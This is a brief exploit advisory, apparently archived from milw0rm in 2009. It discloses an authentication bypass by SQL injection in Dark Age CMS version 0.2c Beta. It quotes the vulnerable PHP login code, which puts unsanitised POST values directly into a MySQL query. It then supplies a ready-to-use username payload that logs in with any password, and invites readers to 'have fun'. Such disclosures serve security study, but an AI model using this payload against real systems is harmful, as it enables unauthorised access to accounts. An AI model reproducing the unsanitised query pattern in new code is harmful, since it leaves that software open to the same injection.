--+++==================================================================================+++-- --+++====== Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability ======+++-- --+++==================================================================================+++-- [+] Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability [+] Author: darkjoker [+] Site : http://darkjoker.net23.net [+] Notes : Have fun [+] Code [+] $username = $_POST['username']; [+] $user_password = $_POST['password']; [+] $password = md5($user_password); [+] [+] $query = "SELECT * FROM " . ACCOUNTS_TABLE . " WHERE username='$username' AND password = '$password'"; [+] $result = mysql_query($query) or die('error making query'); [+] [+] Login data: [+] Username: x' OR 'x' = 'x'# [+] Password: anything # milw0rm.com [2009-01-13]